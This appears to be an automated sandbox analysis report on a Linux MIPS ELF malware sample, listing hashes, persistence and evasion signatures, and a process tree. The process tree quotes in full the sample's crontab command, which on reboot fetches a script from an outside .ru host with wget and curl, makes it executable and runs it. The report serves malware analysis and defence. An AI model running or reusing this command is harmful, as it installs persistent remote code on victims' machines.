Analysis

  • max time kernel
    150s
  • max time network
    149s
  • platform
    debian-9_mips
  • resource
    debian9-mipsbe-20240611-en
  • resource tags

    arch:mipsimage:debian9-mipsbe-20240611-enkernel:4.9.0-13-4kc-maltalocale:en-usos:debian-9-mipssystem
  • submitted
    28-10-2024 01:07

General

  • Target

    0d8c3289a2b21abb0d414e2c730d46081e9334a97b5e0b52b9a2f248c59a59ad.elf

  • Size

    99KB

  • MD5

    2bc1855eb4297c28116e412b6705e14a

  • SHA1

    4d8189399c887b335e1d690961e38b806948d9cd

  • SHA256

    0d8c3289a2b21abb0d414e2c730d46081e9334a97b5e0b52b9a2f248c59a59ad

  • SHA512

    1074aa161b94e13c473e8cf23d6bbd6baa531854b4c110b8142ccd8e8296b6a94751e55907f9ed6aff7d1b470676c81ea5754fdfeef14f8829dc9a5e3452d26e

  • SSDEEP

    1536:uo6JSd6vTfjZ0IonWnP4MmBGSBGxJGSnuqMLHRvMNswe+fYgHIRyyR:upP5ld4MaqMjRUKuYRyyR

Malware Config

Signatures

  • File and Directory Permissions Modification 1 TTPs 1 IoCs

    Adversaries may modify file or directory permissions to evade defenses.

  • Renames itself 1 IoCs
  • Unexpected DNS network traffic destination 2 IoCs

    Network traffic to other servers than the configured DNS servers was detected on the DNS port.

  • Creates/modifies Cron job 1 TTPs 1 IoCs

    Cron allows running tasks on a schedule, and is commonly used for malware persistence.

  • Changes its process name 1 IoCs
  • Reads runtime system information 16 IoCs

    Reads data from /proc virtual filesystem.

Processes

  • /tmp/0d8c3289a2b21abb0d414e2c730d46081e9334a97b5e0b52b9a2f248c59a59ad.elf
    /tmp/0d8c3289a2b21abb0d414e2c730d46081e9334a97b5e0b52b9a2f248c59a59ad.elf
    1⤵
    • Renames itself
    • Changes its process name
    • Reads runtime system information
    PID:705
    • /bin/sh
      sh -c "(crontab -l ; echo \"@reboot cd /tmp; wget http://hailcocks.ru/wget.sh; curl --output wget.sh http://hailcocks.ru/wget.sh; chmod 777 wget.sh; ./wget.sh\") | crontab -"
      2⤵
      • File and Directory Permissions Modification
      PID:709
      • /usr/bin/crontab
        crontab -
        3⤵
        • Creates/modifies Cron job
        • Reads runtime system information
        PID:712
      • /usr/bin/crontab
        crontab -l
        3⤵
        • Reads runtime system information
        PID:713

Network

MITRE ATT&CK Enterprise v15

Replay Monitor

Loading Replay Monitor...

Downloads

  • /var/spool/cron/crontabs/tmp.22OlBk

    Filesize

    306B

    MD5

    7f870874f6e2e8a519bfb12fd9595bae

    SHA1

    a06aa499becd5f448356d6dcd76441142f5f4142

    SHA256

    09cfd32d5d70dceebe59d6eecc03de39f65428f59b214c62dea20d331085c51d

    SHA512

    f05c5887976e1e645d3b82d48f1492b24ef680e54483625d8eecc912ea4d38c36db62d9296bff4e3b1f418e7e50cde9c5083d685e77860c61372b19a6c06d620